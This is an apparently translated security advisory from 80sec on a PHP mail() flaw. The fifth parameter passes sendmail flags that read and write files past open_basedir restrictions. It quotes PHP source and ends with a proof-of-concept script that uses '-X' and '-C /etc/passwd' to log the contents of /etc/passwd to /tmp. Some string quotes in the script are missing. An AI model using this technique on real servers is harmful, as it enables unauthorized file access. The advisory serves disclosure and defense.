Php mail function open_basedir bypass

Vulnerability Description: php is a widely used programming language that can be nested in html for web development. However, 80sec found that there are problems in the Mail function design of php, attackers may bypass other restrictions such as open_basedir to read and write arbitrary files as httpd processes. Combined with the application context, the File Read and Write vulnerability may also occur.
Vulnerability Analysis: php Mail functions are implemented in the php Source Code as follows:


......
if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE Restriction in effect. The fifth parameter is disabled in SAFE MODE.");
RETURN_FALSE;
}

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sss|ss",
&to, &to_len,
&subject, &subject_len,
&message, &message_len,
&headers, &headers_len,
&extra_cmd, &extra_cmd_len
) == FAILURE) {
return;
}
......

if (force_extra_parameters) {
extra_cmd = estrdup(force_extra_parameters);
} else if (extra_cmd) {
extra_cmd = php_escape_shell_cmd(extra_cmd);
}

if (php_mail(to_r, subject_r, message, headers, extra_cmd TSRMLS_CC)) {
RETVAL_TRUE;
} else {
RETVAL_FALSE;
}
.....

In php_mail


PHPAPI int php_mail(char *to, char *subject, char *message, char *headers, char *extra_cmd TSRMLS_DC)
{
....
FILE *sendmail;
int ret;
char *sendmail_path = INI_STR("sendmail_path");
char *sendmail_cmd = NULL;

....
if (extra_cmd != NULL) {
sendmail_cmd = emalloc (strlen (sendmail_path) + strlen (extra_cmd) + 2);
strcpy (sendmail_cmd, sendmail_path);
strcat (sendmail_cmd, " ");
strcat (sendmail_cmd, extra_cmd);
} else {
sendmail_cmd = sendmail_path;
}
....
/* Since popen() doesnt indicate if the internal fork() doesnt work
* (e.g. the shell cant be executed) we explicitely set it to 0 to be
* sure we dont catch any older errno value. */
errno = 0;
sendmail = popen(sendmail_cmd, "w");

In Linux, the Mail function Concatenates the INI_STR ("sendmail_path") content and additional parameters to execute the command. However, the additional parameters are processed by php_escape_shell_cmd before splicing, therefore, we cannot execute additional commands. However, by checking the sendmail command help, we can find that some parameters of sendmail can be used to read and write files, with this feature, if we control 5th parameters, we can obtain the read and write permissions on the file system without restrictions such as open_basedir.

Vulnerability Testing:

<?php
$to = jianxin@80sec.com.str_repeat("x",10000);
$subject = the subject.str_repeat("x",10);
$message = hello.str_repeat("x",10);
mail($to, $subject, $message, $headers,"-v -bt -X /tmp/80sec -d13 -C /etc/passwd");
?>


The content on this site is original. For reprinted content, be sure to keep your signatures and links!
Html "> Php mail function open_basedir bypass: Http://www.80sec.com/php-mail-function-open_basedir-bypass.html